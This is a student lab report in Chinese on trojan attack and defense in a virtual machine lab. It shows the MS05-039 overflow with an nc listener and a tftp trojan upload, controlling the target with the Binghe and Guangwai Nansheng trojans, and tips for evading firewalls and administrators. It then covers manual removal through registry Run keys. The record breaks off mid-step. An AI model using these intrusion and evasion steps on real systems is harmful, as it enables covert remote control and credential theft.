计算机网络安全实验报告(I).doc

计算机网络安全实验报告实验序号：7实验项目名称：木马攻击与防范实验学号姓名专业、班实验地点实1-411指导教师实验时间2011-11-22一、实验目的及要求理解和掌握木马传播和运行的机制，掌握检查和删除木马的技巧，学会防御木马的相关知识，加深对木马的安全防范意识。二、实验设备（环境）及要求Windows 2000 server，虚拟机三、实验内容与步骤实验任务一：“冰河”木马本实验需要把真实主机作为攻击机，虚拟机作为靶机。即首先利用ms05039溢出工具入侵虚拟机，然后利用“冰河”木马实现对虚拟机的完全控制。最后对木马进行查杀。实验任务二：“广外男生”木马本实验将真实机作为攻击机，虚拟机作为靶机。真实机利用“广外男生”木马对虚拟机进行攻击，最终完全取得虚拟机的控制权。最后学习木马的查杀。四、实验结果与数据处理实验任务一：“冰河”木马步骤1：入侵准备工作1）下载和安装木马软件前，关闭杀毒软件的自动防护功能，避免程序会被当作病毒而强行终止。2）运行G_CLIENT.EXE；3）选择菜单“设置”-“配置服务程序”；4）设置访问口令为“1234567”，其它为默认值，点击 “确定”生成木马的服务端程序G_SERVER.EXE。5）将生成的木马服务程序G_SERVER.EXE拷贝到tftp服务的目录即C:攻防tftp32。6）运行tftpd32.exe。保持此程序一直开启，用于等待攻击成功后传输木马服务程序。步骤2：进行攻击，将木马放置在被攻击端1)对靶机P3进行攻击，首先运行nc -vv -l -p 99接着再开一个dos窗口，运行ms05039 3 99 12)攻击成功后，在运行nc -vv -l -p 99 的dos窗口中出现提示，若攻击不成功请参照“缓冲区溢出攻击与防范实验”，再次进行攻击。3）在此窗口中运行tftp -i get g_server.exe将木马服务程序G_server.exe上传到靶机P3上，并直接输入g_server.exe使之运行。步骤3：运行木马客户程序控制远程主机1）打开程序端程序，单击快捷工具栏中的“添加主机”按扭，如图8所示。 “显示名称”：填入显示在主界面的名称“target” “主机地址”：填入服务器端主机的IP地址“3”。 “访问口令”：填入每次访问主机的密码，这里输入“1234567”。 “监听端口”：“冰河”默认的监听端口是7626，控制端可以修改它以绕过防火墙。单击“确定”按扭，即可以看到主机面上添加了主机。这时我们就可以像操作自己的电脑一样操作远程目标电脑，比如打开C:WINNTsystem32config目录可以找到对方主机上保存用户口令的SAM文件。点击鼠标右键，可以发现有上传和下载功能。即可以随意将虚拟机器上的机密文件下载到本机上，也可以把恶意文件上传到该虚拟机上并运行。可见，其破坏性是巨大的。2）“文件管理器”使用。点击各个驱动器或者文件夹前面的展开符号，可以浏览目标主机内容。然后选中文件，在右键菜单中选中“下载文件至.”，在弹出的对话框中选好本地存储路径，点击“保存”。2）“命令控制台”使用。单击“命令控制台”的标签，弹出命令控制台界面，验证控制的各种命令。 a. 口令类命令：展开“口令类命令”， a.1 “系统信息及口令”可以查看远程主机的系统信息，开机口令，缓存口令等。 a.2 “历史口令”可以查看远程主机以往使用的口令。 a.3 “击键记录”可以记录远程主机用户击键记录，以次可以分析出远程主机的各种帐号和口令或各种秘密信息。 b. 控制类命令：展开“控制类命令”，b.1 “捕获屏幕” 可以使控制端使用者查看远程主机的屏幕。 b.2 “发送信息” 可以向远程计算机发送Windows标准的各种信息。 b.3 “进程管理” 可以使控制者查看远程主机上所有的进程。单击“查看进程”按钮，就可以看到远程主机上存在的进程，甚至还可以终止某个进程，只要选中相应的进程，然后单击“终止进程”就可以了。b.4 “窗口管理” 可以使远程主机上的窗口进行刷新，最大化，最小化，激活，隐藏等。 b.5 “系统管理” 可以使远程主机进行关机，重启，重新加载“冰河”，自动卸载“冰河”的操作。 b.6 “鼠标控制” 可以使远程主机上的鼠标锁定在某个范围内。 b.7 “其他控制” 可以使远程主机上进行自动拨号禁止，桌面隐藏，注册表锁定等操作。c 网络类命令 展开“网络类命令”，c.1 “创建共享”在远程主机上创建自己的共享。 c.2 “删除共享”在远程主机上删除某个特定的共享。 c.3 “网络信息”可以看到远程主机上的IPC$，C$，ADMIN$等共享。 d 文件类命令： 展开“文件类命令”，文件浏览，“文件查找”，“文件压缩”，“文件删除”，“文件打开”等。 e 注册表读写： 展开“注册表读写” f 设置类命令: 展开“设置类命令”步骤4：删除“冰河”木马删除“冰河”木马的方法：A客户端的自动卸载功能，在“控制命令类”中的“系统控制”里面就有自动卸载功能，执行这个功能，远程主机上的木马就自动卸载了。B手动卸载，查看注册表，打开windows注册编辑器。 打开HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun如图16。在目录中发现了一个默认的键值C:WINNTSystem32kernel32.exe，这就是“冰河”木马在注册表中加入的键值，将它删除。 打开HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVesionRunservices。在目录中也发现了一个默认的键值C:WINNTSystem32kernel32.exe，这也是“冰河”在注册表中加入的键值，将它删除。上面两个注册表的子键目录Run和Runservices中存放的键值是系统启动时自启动的程序，一般病毒程序，木马程序，后门程序等都放在这些子键目录下，所以要经常检查这些目录下的程序。 然后再进入C:WINNTSystem32目录，找到“冰河”的两个可执行文件Kernel32.exe和Sysexplr.exe文件，将它们删除。修改文件关联也是木马常用的手段，“冰河”将txt文件的缺省打开方式由notepad.exe改为木马的启动程序，除此之外，html，exe，zip，com等都是木马的目标。所以，最后还需要恢复注册表中的txt文件关联功能，只要将注册表中的HKEY_CLASSES_ROOTtxtfileshellopencommand下的默认值，改为C:Windowsnotpad.exe %1，即可。这样，再次重启计算机我们就完全删除了“冰河”木马。C杀毒软件查杀 大部分杀毒软件都有查杀木马的功能，可以通过这个功能对主机进行全面扫描来去除木马，就彻底把木马文件删除了。实验任务二：“广外男生”木马1）“广外男生”的连接运行gwboy.exe，打开“广外男生”的主程序，主界面。进行客户端设置。依次单击“设置”“客户端设置”，弹出客户端设置界面如图21。我们可以看到它采用“反弹窗口线程插入技术”的提示。在“客户端最大连接数”中填入允许多少台客户端主机来控制服务器端，注意不要太多，否则容易造成服务器端主机死机。在“客户端使用端口”填入服务器端连接到客户端的那个端口，这是迷惑远程服务器端主机管理员和防火墙的关键，填入一些常用端口，会使远程主机管理员和防火墙误以为连接的是个合法的程序。比如使用端口80（此例中，为避免端口冲突，我们使用1500端口）。选择“只允许以上地址连接”选项，使客户端主机IP地址处于默认的合法控制IP地址池中。（2）设置木马的连接类型，如果使用反弹端口方式二则在弹出对话框中选中“使用HTTP网页IP通知”；如果使用反弹端口方式一，则选择“客户处于静态IP（固定IP地址）”。此处我们选择后者。单击“下一步”，和“完成”，结束客户端设置。（4）进行服务器端设置。依次单击“设置”“生成服务器端”，这时弹出“广外男生”服务器端生成向导，直接单击“下一步”，弹出常规设置界面。在“EXE文件名”和“DLL文件名”中填入加载到远程主机系统目录下的可执行文件和动态链接库文件，在“注册表项目”中填入加载到远程主机注册表中的Run目录下的键值名。这些文件名都是相当重要的，因为这是迷惑远程主机管理员的关键所在，如果文件名起的非常隐蔽，如sysremote.exe， sysremote.dll，那么就算管理员发现了这些文件也不肯定这些文件就是木马而轻易删除。注意：把“服务器端运行时显示运行标志并允许对方退出”前面的对勾去掉，否则服务器端主机的管理员就可以轻易发现自己被控制了。（5）进行网络设置，如图24选择“静态IP”，在“客户端IP地址”中填入入侵者的静态IP地址（即真实机IP），“客户端用端口”填入在客户端设置中选则的连接端口。（6）生成代理文件，在“目标文件”中填入所生成服务器端程序的存放位置，如E:gwboy092Ahacktest.exe，这个文件就是需要植入远程主机的木马文件。单击“完成”即可完成服务器端程序的设置，这时就生成了一个文件名为hacktest.exe的可执行文件，并将该文件拷贝到虚拟机桌面上（7）进行客户端与服务器连接。在虚拟机上执行木马程序hacktest.exe，等待一段时间后客户端主机“广外男生”显示连接成功。这时，就可以和使用第2代木马“冰河”一样控制远程主机，主要的控制选项有“文件共享”，“远程注册表”，“进程与服务”，“远程桌面”等。手动删除“广外男生”木马“广外男生”木马除了可以采用防病毒软件查杀之外，还可以通过手动方法删除，具体手动删除步骤如下：（1）依次单击“开始”“运行”，输入regedit进入注册表，依次展开到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrent VersionRun，在里面找到木马自启动文件进行删除。（2）进入C:WINNTSystem32，按文件大小进行排序，寻找116kb的文件。在这些文件中找到修改时间离现在比较近的，一般就是最近所添加的文件，将gwboy.exe文件删除。（3）在注册表中依次单击“编辑”“查找”，查找文件名为gwboydll.dll的文件，找到后将相关注册表项全部删除（4）重新启动主机，按F8进入带命令